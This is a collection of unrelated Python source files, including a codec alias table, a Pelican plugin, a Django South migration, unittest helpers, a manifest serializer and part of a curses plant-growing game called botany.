's_jisx0213' : 'shift_jisx0213',
# tactis codec
'tis260' : 'tactis',
# tis_620 codec
'tis620' : 'tis_620',
'tis_620_0' : 'tis_620',
'tis_620_2529_0' : 'tis_620',
'tis_620_2529_1' : 'tis_620',
'iso_ir_166' : 'tis_620',
# utf_16 codec
'u16' : 'utf_16',
'utf16' : 'utf_16',
# utf_16_be codec
'unicodebigunmarked' : 'utf_16_be',
'utf_16be' : 'utf_16_be',
# utf_16_le codec
'unicodelittleunmarked' : 'utf_16_le',
'utf_16le' : 'utf_16_le',
# utf_32 codec
'u32' : 'utf_32',
'utf32' : 'utf_32',
# utf_32_be codec
'utf_32be' : 'utf_32_be',
# utf_32_le codec
'utf_32le' : 'utf_32_le',
# utf_7 codec
'u7' : 'utf_7',
'utf7' : 'utf_7',
'unicode_1_1_utf_7' : 'utf_7',
# utf_8 codec
'u8' : 'utf_8',
'utf' : 'utf_8',
'utf8' : 'utf_8',
'utf8_ucs2' : 'utf_8',
'utf8_ucs4' : 'utf_8',
## uu_codec codec
#'uu' : 'uu_codec',
## zlib_codec codec
#'zip' : 'zlib_codec',
#'zlib' : 'zlib_codec',
# temporary mac CJK aliases, will be replaced by proper codecs in 3.1
'x_mac_japanese' : 'shift_jis',
'x_mac_korean' : 'euc_kr',
'x_mac_simp_chinese' : 'gb2312',
'x_mac_trad_chinese' : 'big5',
}
|
class A:
pass
class B:
pass
|
"""
Dateish Plugin for Pelican
==========================
This plugin adds the ability to treat arbitrary metadata fields as datetime
objects.
"""
from pelican import signals
from pelican.utils import get_date
def dateish(generator):
if 'DATEISH_PROPERTIES' not in generator.settings:
return
for article in generator.articles:
for field in generator.settings['DATEISH_PROPERTIES']:
if hasattr(article, field):
value = getattr(article, field)
if type(value) == list:
setattr(article, field, [get_date(d) for d in value])
else:
setattr(article, field, get_date(value))
def register():
signals.article_generator_finalized.connect(dateish)
|
from pyb import SPI
for bus in (-1, 0, 1, 2, 3, "X", "Y", "Z"):
try:
SPI(bus)
print("SPI", bus)
except ValueError:
print("ValueError", bus)
spi = SPI(1)
print(spi)
spi = SPI(1, SPI.MASTER)
spi = SPI(1, SPI.MASTER, baudrate=500000)
spi = SPI(1, SPI.MASTER, 500000, polarity=1, phase=0, bits=8, firstbit=SPI.MSB, ti=False, crc=None)
print(spi)
spi.init(SPI.SLAVE, phase=1)
print(spi)
try:
# need to flush input before we get an error (error is what we want to test)
for i in range(10):
spi.recv(1, timeout=100)
except OSError:
print("OSError")
spi.init(SPI.MASTER)
spi.send(1, timeout=100)
print(spi.recv(1, timeout=100))
print(spi.send_recv(1, timeout=100))
|
import sys, os
extensions = ['sphinx.ext.pngmath']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'ns-3'
copyright = u'2011, ns-3 project'
version = 'ns-3-dev'
release = 'ns-3-dev'
exclude_patterns = []
pygments_style = 'sphinx'
html_theme = 'ns3_html_theme'
html_theme_path = ['../..']
html_title = 'Model Library'
html_short_title = 'Models'
html_static_path = ['_static']
html_last_updated_fmt = '%b %d, %Y %H:%M'
htmlhelp_basename = 'ns-3doc'
latex_documents = [
('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
u'ns-3 project', 'manual'),
]
latex_logo = '../../ns3_html_theme/static/ns-3.png'
man_pages = [
('index', 'ns-3-model-library', u'ns-3 Model Library',
[u'ns-3 project'], 1)
]
|
"""Django Unit Test framework."""
from django.test.client import Client, RequestFactory
from django.test.testcases import (
LiveServerTestCase, SimpleTestCase, TestCase, TransactionTestCase,
skipIfDBFeature, skipUnlessAnyDBFeature, skipUnlessDBFeature,
)
from django.test.utils import (
ignore_warnings, modify_settings, override_settings,
override_system_checks, tag,
)
__all__ = [
'Client', 'RequestFactory', 'TestCase', 'TransactionTestCase',
'SimpleTestCase', 'LiveServerTestCase', 'skipIfDBFeature',
'skipUnlessAnyDBFeature', 'skipUnlessDBFeature', 'ignore_warnings',
'modify_settings', 'override_settings', 'override_system_checks', 'tag',
]
|
import bench
def func(a, b, c):
pass
def test(num):
for i in iter(range(num)):
func(i, i, i)
bench.run(test)
|
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, IntegrityError
class Migration(DataMigration):
def forwards(self, orm):
"""Map all Finance Admins to Sales Admins."""
finance_admins = orm['student.courseaccessrole'].objects.filter(role='finance_admin')
for finance_admin in finance_admins:
sales_admin = orm['student.courseaccessrole'](
role='sales_admin',
user=finance_admin.user,
org=finance_admin.org,
course_id=finance_admin.course_id,
)
try:
sales_admin.save()
except IntegrityError:
pass # If sales admin roles exist, continue.
def backwards(self, orm):
"""Remove all sales administrators, as they did not exist before this migration. """
sales_admins = orm['student.courseaccessrole'].objects.filter(role='sales_admin')
sales_admins.delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.anonymoususerid': {
'Meta': {'object_name': 'AnonymousUserId'},
'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseaccessrole': {
'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollmentallowed': {
'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'student.dashboardconfiguration': {
'Meta': {'object_name': 'DashboardConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recent_enrollment_time_delta': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'student.loginfailures': {
'Meta': {'object_name': 'LoginFailures'},
'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.passwordhistory': {
'Meta': {'object_name': 'PasswordHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
},
'student.usersignupsource': {
'Meta': {'object_name': 'UserSignupSource'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.userstanding': {
'Meta': {'object_name': 'UserStanding'},
'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
symmetrical = True
|
import unittest
class TestHashing(object):
"""Used as a mixin for TestCase"""
# Check for a valid __hash__ implementation
def test_hash(self):
for obj_1, obj_2 in self.eq_pairs:
try:
if not hash(obj_1) == hash(obj_2):
self.fail("%r and %r do not hash equal" % (obj_1, obj_2))
except KeyboardInterrupt:
raise
except Exception, e:
self.fail("Problem hashing %r and %r: %s" % (obj_1, obj_2, e))
for obj_1, obj_2 in self.ne_pairs:
try:
if hash(obj_1) == hash(obj_2):
self.fail("%s and %s hash equal, but shouldn't" %
(obj_1, obj_2))
except KeyboardInterrupt:
raise
except Exception, e:
self.fail("Problem hashing %s and %s: %s" % (obj_1, obj_2, e))
class TestEquality(object):
"""Used as a mixin for TestCase"""
# Check for a valid __eq__ implementation
def test_eq(self):
for obj_1, obj_2 in self.eq_pairs:
self.assertEqual(obj_1, obj_2)
self.assertEqual(obj_2, obj_1)
# Check for a valid __ne__ implementation
def test_ne(self):
for obj_1, obj_2 in self.ne_pairs:
self.assertNotEqual(obj_1, obj_2)
self.assertNotEqual(obj_2, obj_1)
class LoggingResult(unittest.TestResult):
def __init__(self, log):
self._events = log
super(LoggingResult, self).__init__()
def startTest(self, test):
self._events.append('startTest')
super(LoggingResult, self).startTest(test)
def startTestRun(self):
self._events.append('startTestRun')
super(LoggingResult, self).startTestRun()
def stopTest(self, test):
self._events.append('stopTest')
super(LoggingResult, self).stopTest(test)
def stopTestRun(self):
self._events.append('stopTestRun')
super(LoggingResult, self).stopTestRun()
def addFailure(self, *args):
self._events.append('addFailure')
super(LoggingResult, self).addFailure(*args)
def addSuccess(self, *args):
self._events.append('addSuccess')
super(LoggingResult, self).addSuccess(*args)
def addError(self, *args):
self._events.append('addError')
super(LoggingResult, self).addError(*args)
def addSkip(self, *args):
self._events.append('addSkip')
super(LoggingResult, self).addSkip(*args)
def addExpectedFailure(self, *args):
self._events.append('addExpectedFailure')
super(LoggingResult, self).addExpectedFailure(*args)
def addUnexpectedSuccess(self, *args):
self._events.append('addUnexpectedSuccess')
super(LoggingResult, self).addUnexpectedSuccess(*args)
class ResultWithNoStartTestRunStopTestRun(object):
"""An object honouring TestResult before startTestRun/stopTestRun."""
def __init__(self):
self.failures = []
self.errors = []
self.testsRun = 0
self.skipped = []
self.expectedFailures = []
self.unexpectedSuccesses = []
self.shouldStop = False
def startTest(self, test):
pass
def stopTest(self, test):
pass
def addError(self, test):
pass
def addFailure(self, test):
pass
def addSuccess(self, test):
pass
def wasSuccessful(self):
return True
|
KEY_LENGTH = 16
SREG2AX = { # from http://www.axschema.org/types/#sreg
'nickname': 'http://axschema.org/namePerson/friendly',
'email': 'http://axschema.org/contact/email',
'fullname': 'http://axschema.org/namePerson',
'dob': 'http://axschema.org/birthDate',
'gender': 'http://axschema.org/person/gender',
'postcode': 'http://axschema.org/contact/postalCode/home',
'country': 'http://axschema.org/contact/country/home',
'language': 'http://axschema.org/pref/language',
'timezone': 'http://axschema.org/pref/timezone',
}
|
from node import NodeVisitor, ValueNode, ListNode, BinaryExpressionNode
from parser import atoms, precedence
atom_names = {v:"@%s" % k for (k,v) in atoms.iteritems()}
named_escapes = set(["\a", "\b", "\f", "\n", "\r", "\t", "\v"])
def escape(string, extras=""):
rv = ""
for c in string:
if c in named_escapes:
rv += c.encode("unicode_escape")
elif c == "\\":
rv += "\\\\"
elif c < '\x20':
rv += "\\x%02x" % ord(c)
elif c in extras:
rv += "\\" + c
else:
rv += c
return rv.encode("utf8")
class ManifestSerializer(NodeVisitor):
def __init__(self, skip_empty_data=False):
self.skip_empty_data = skip_empty_data
def serialize(self, root):
self.indent = 2
rv = "\n".join(self.visit(root))
if rv[-1] != "\n":
rv = rv + "\n"
return rv
def visit_DataNode(self, node):
rv = []
if not self.skip_empty_data or node.children:
if node.data:
rv.append("[%s]" % escape(node.data, extras="]"))
indent = self.indent * " "
else:
indent = ""
for child in node.children:
rv.extend("%s%s" % (indent if item else "", item) for item in self.visit(child))
if node.parent:
rv.append("")
return rv
def visit_KeyValueNode(self, node):
rv = [escape(node.data, ":") + ":"]
indent = " " * self.indent
if len(node.children) == 1 and isinstance(node.children[0], (ValueNode, ListNode)):
rv[0] += " %s" % self.visit(node.children[0])[0]
else:
for child in node.children:
rv.append(indent + self.visit(child)[0])
return rv
def visit_ListNode(self, node):
rv = ["["]
rv.extend(", ".join(self.visit(child)[0] for child in node.children))
rv.append("]")
return ["".join(rv)]
def visit_ValueNode(self, node):
if "#" in node.data or (isinstance(node.parent, ListNode) and
("," in node.data or "]" in node.data)):
if "\"" in node.data:
quote = "'"
else:
quote = "\""
else:
quote = ""
return [quote + escape(node.data, extras=quote) + quote]
def visit_AtomNode(self, node):
return [atom_names[node.data]]
def visit_ConditionalNode(self, node):
return ["if %s: %s" % tuple(self.visit(item)[0] for item in node.children)]
def visit_StringNode(self, node):
rv = ["\"%s\"" % escape(node.data, extras="\"")]
for child in node.children:
rv[0] += self.visit(child)[0]
return rv
def visit_NumberNode(self, node):
return [str(node.data)]
def visit_VariableNode(self, node):
rv = escape(node.data)
for child in node.children:
rv += self.visit(child)
return [rv]
def visit_IndexNode(self, node):
assert len(node.children) == 1
return ["[%s]" % self.visit(node.children[0])[0]]
def visit_UnaryExpressionNode(self, node):
children = []
for child in node.children:
child_str = self.visit(child)[0]
if isinstance(child, BinaryExpressionNode):
child_str = "(%s)" % child_str
children.append(child_str)
return [" ".join(children)]
def visit_BinaryExpressionNode(self, node):
assert len(node.children) == 3
children = []
for child_index in [1, 0, 2]:
child = node.children[child_index]
child_str = self.visit(child)[0]
if (isinstance(child, BinaryExpressionNode) and
precedence(node.children[0]) < precedence(child.children[0])):
child_str = "(%s)" % child_str
children.append(child_str)
return [" ".join(children)]
def visit_UnaryOperatorNode(self, node):
return [str(node.data)]
def visit_BinaryOperatorNode(self, node):
return [str(node.data)]
def serialize(tree, *args, **kwargs):
s = ManifestSerializer(*args, **kwargs)
return s.serialize(tree)
|
import curses
import math
import os
import traceback
import threading
import time
import random
overflow = False # set to True to enable growth past final stage (softcorrupts plant file)
class CursedMenu(object):
#TODO: name your plant
'''A class which abstracts the horrors of building a curses-based menu system'''
def __init__(self, this_plant, this_data):
'''Initialization'''
self.initialized = False
self.screen = curses.initscr()
curses.noecho()
curses.raw()
curses.start_color()
try:
curses.curs_set(0)
except curses.error:
# Not all terminals support this functionality.
# When the error is ignored the screen will look a little uglier, but that's not terrible
# So in order to keep botany as accesible as possible to everyone, it should be safe to ignore the error.
pass
self.screen.keypad(1)
self.plant = this_plant
self.user_data = this_data
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(self.plant.ticks)
self.exit = False
self.infotoggle = 0
self.maxy, self.maxx = self.screen.getmaxyx()
# Highlighted and Normal line definitions
self.define_colors()
self.highlighted = curses.color_pair(1)
self.normal = curses.A_NORMAL
# Threaded screen update for live changes
screen_thread = threading.Thread(target=self.update_plant_live, args=())
screen_thread.daemon = True
screen_thread.start()
self.screen.clear()
self.show(["water","look","garden","instructions","set score to 9000","grow plant 1 stage","bring plant back from dead"], title=' botany ', subtitle='options')
def define_colors(self):
# set curses color pairs manually
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(7, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(8, curses.COLOR_CYAN, curses.COLOR_BLACK)
def show(self, options, title, subtitle):
# Draws a menu with parameters
self.set_options(options)
self.update_options()
self.title = title
self.subtitle = subtitle
self.selected = 0
self.initialized = True
self.draw_menu()
def update_options(self):
# Makes sure you can get a new plant if it dies
if self.plant.dead:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if self.plant.stage == 5:
if "harvest" not in self.options:
self.options.insert(-1,"harvest")
else:
if "harvest" in self.options:
self.options.remove("harvest")
def set_options(self, options):
# Validates that the last option is "exit"
if options[-1] is not 'exit':
options.append('exit')
self.options = options
def draw(self):
# Draw the menu and lines
self.screen.refresh()
try:
self.draw_default()
self.screen.refresh()
except Exception as exception:
# Makes sure data is saved in event of a crash due to window resizing
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
traceback.print_exc()
def draw_menu(self):
# Actually draws the menu and handles branching
request = ""
try:
while request is not "exit":
self.draw()
request = self.get_user_input()
self.handle_request(request)
self.__exit__()
# Also calls __exit__, but adds traceback after
except Exception as exception:
self.screen.clear()
self.screen.addstr(0, 0, "Enlarge terminal!", curses.A_NORMAL)
self.screen.refresh()
self.__exit__()
#traceback.print_exc()
def ascii_render(self, filename, ypos, xpos):
# Prints ASCII art from file at given coordinates
this_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),"art")
this_filename = os.path.join(this_dir,filename)
this_file = open(this_filename,"r")
this_string = this_file.readlines()
this_file.close()
for y, line in enumerate(this_string, 2):
self.screen.addstr(ypos+y, xpos, line, curses.A_NORMAL)
# self.screen.refresh()
def draw_plant_ascii(self, this_plant):
ypos = 1
xpos = int((self.maxx-37)/2 + 25)
plant_art_dict = {
0: 'poppy',
1: 'cactus',
2: 'aloe',
3: 'flytrap',
4: 'jadeplant',
5: 'fern',
6: 'daffodil',
7: 'sunflower',
8: 'baobab',
9: 'lithops',
10: 'hemp',
11: 'pansy',
12: 'iris',
13: 'agave',
14: 'ficus',
15: 'moss',
16: 'sage',
17: 'snapdragon',
18: 'columbine',
19: 'brugmansia',
20: 'palm',
}
if this_plant.dead == True:
self.ascii_render('rip.txt', ypos, xpos)
elif this_plant.stage == 0:
self.ascii_render('seed.txt', ypos, xpos)
elif this_plant.stage == 1:
self.ascii_render('seedling.txt', ypos, xpos)
elif this_plant.stage == 2:
this_filename = plant_art_dict[this_plant.species]+'1.txt'
self.ascii_render(this_filename, ypos, xpos)
elif this_plant.stage == 3 or this_plant.stage == 5:
this_filename = plant_art_dict[this_plant.species]+'2.txt'
self.ascii_render(this_filename, ypos, xpos)
elif this_plant.stage == 4:
this_filename = plant_art_dict[this_plant.species]+'3.txt'
self.ascii_render(this_filename, ypos, xpos)
def draw_default(self):
# draws default menu
clear_bar = " " * (int(self.maxx*2/3))
self.screen.addstr(2, 2, self.title, curses.A_STANDOUT) # Title for this menu
self.screen.addstr(4, 2, self.subtitle, curses.A_BOLD) #Subtitle for this menu
# clear menu on screen
for index in range(len(self.options)+1):
self.screen.addstr(5+index, 4, clear_bar, curses.A_NORMAL)
# display all the menu items, showing the 'pos' item highlighted
for index in range(len(self.options)):
textstyle = self.normal
if index == self.selected:
textstyle = self.highlighted
self.screen.addstr(5+index ,4, clear_bar, curses.A_NORMAL)
self.screen.addstr(5+index ,4, "%d - %s" % (index+1, self.options[index]), textstyle)
self.screen.addstr(19, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(20, 2, clear_bar, curses.A_NORMAL)
self.screen.addstr(19, 2, "plant: ", curses.A_DIM)
self.screen.addstr(19, 9, self.plant_string, curses.A_NORMAL)
self.screen.addstr(20, 2, "score: ", curses.A_DIM)
self.screen.addstr(20, 9, self.plant_ticks, curses.A_NORMAL)
# display fancy water gauge
if not self.plant.dead:
water_gauge_str = self.water_gauge()
self.screen.addstr(5,14, water_gauge_str, curses.A_NORMAL)
else:
self.screen.addstr(5,13, clear_bar, curses.A_NORMAL)
self.screen.addstr(5,13, " ( RIP )", curses.A_NORMAL)
# draw cute ascii from files
self.draw_plant_ascii(self.plant)
def water_gauge(self):
# build nice looking water gauge
water_left_pct = 1 - ((time.time() - self.plant.watered_timestamp)/86400)
# don't allow negative value
water_left_pct = max(0, water_left_pct)
water_left = int(math.ceil(water_left_pct * 10))
water_string = "(" + (")" * water_left) + ("." * (10 - water_left)) + ") " + str(int(water_left_pct * 100)) + "% "
return water_string
def update_plant_live(self):
# updates plant data on menu screen, live!
while not self.exit:
self.plant_string = self.plant.parse_plant()
self.plant_ticks = str(self.plant.ticks)
if self.initialized:
self.update_options()
self.draw()
time.sleep(1)
def get_user_input(self):
# gets the user's input
try:
user_in = self.screen.getch() # Gets user input
except Exception as e:
self.__exit__()
## DEBUG KEYS - enable these lines to see curses key codes
# self.screen.addstr(1, 1, str(user_in), curses.A_NORMAL)
# self.screen.refresh()
# Resize sends curses.KEY_RESIZE, update display
if user_in == curses.KEY_RESIZE:
self.maxy,self.maxx = self.screen.getmaxyx()
self.screen.clear()
self.screen.refresh()
# enter and exit Keys are special cases
if user_in == 10:
return self.options[self.selected]
if user_in == 27:
return self.options[-1]
# this is a number; check to see if we can set it
if user_in >= ord('1') and user_in <= ord(str(min(9,len(self.options)+1))):
self.selected = user_in - ord('0') - 1 # convert keypress back to a number, then subtract 1 to get index
if self.selected > len(self.options):
self.selected = len(self.options)-1 # prevent choosing option outside of bounds
return
# increment or Decrement
down_keys = [curses.KEY_DOWN, 14, ord('j')]
up_keys = [curses.KEY_UP, 16, ord('k')]
if user_in in down_keys: # down arrow
self.selected += 1
if user_in in up_keys: # up arrow
self.selected -=1
# modulo to wrap menu cursor
self.selected = self.selected % len(self.options)
return
def format_garden_data(self,this_garden):
# Returns list of lists (pages) of garden entries
plant_table = ""
for plant_id in this_garden:
if this_garden[plant_id]:
if not this_garden[plant_id]["dead"]:
this_plant = this_garden[plant_id]
entry = "{:14} - {:>16} - {:>8}p - {}\n".format(
this_plant["owner"],
this_plant["age"],
this_plant["score"],
this_plant["description"]
)
plant_table += entry
# build list of n entries per page
entries_per_page = self.maxy - 16
garden_list = plant_table.splitlines()
paginated_list = [garden_list[i:i+entries_per_page] for i in range(0,len(garden_list),entries_per_page)]
return paginated_list
def draw_garden(self):
# draws community garden
# load data from sqlite db
this_garden = self.user_data.retrieve_garden_from_db()
# format data
self.clear_info_pane()
plant_table_pages = []
if self.infotoggle != 2:
# if infotoggle isn't 2, the screen currently displays other stuff
plant_table_pages = self.format_garden_data(this_garden)
self.infotoggle = 2
else:
# the screen IS currently showing the garden (1 page), make the
# text a bunch of blanks to clear it out
self.infotoggle = 0
# print garden information OR clear it
for page_num, page in enumerate(plant_table_pages, 1):
# Print page text
self.draw_info_text(page)
if len(plant_table_pages) > 1:
# Multiple pages, paginate and require keypress
page_text = "(%d/%d) --- press any key ---" % (page_num, len(plant_table_pages))
self.screen.addstr(self.maxy-2, 2, page_text)
self.screen.getch()
self.screen.refresh()
# Clear page before drawing next
self.clear_info_pane()
self.infotoggle = 0
def get_plant_description(self, this_plant):
output_text = ""
this_species = this_plant.species_dict[this_plant.species]
this_color = this_plant.color_dict[this_plant.color]
this_stage = this_plant.stage
stage_descriptions = {
0:[
"You're excited about your new seed.",
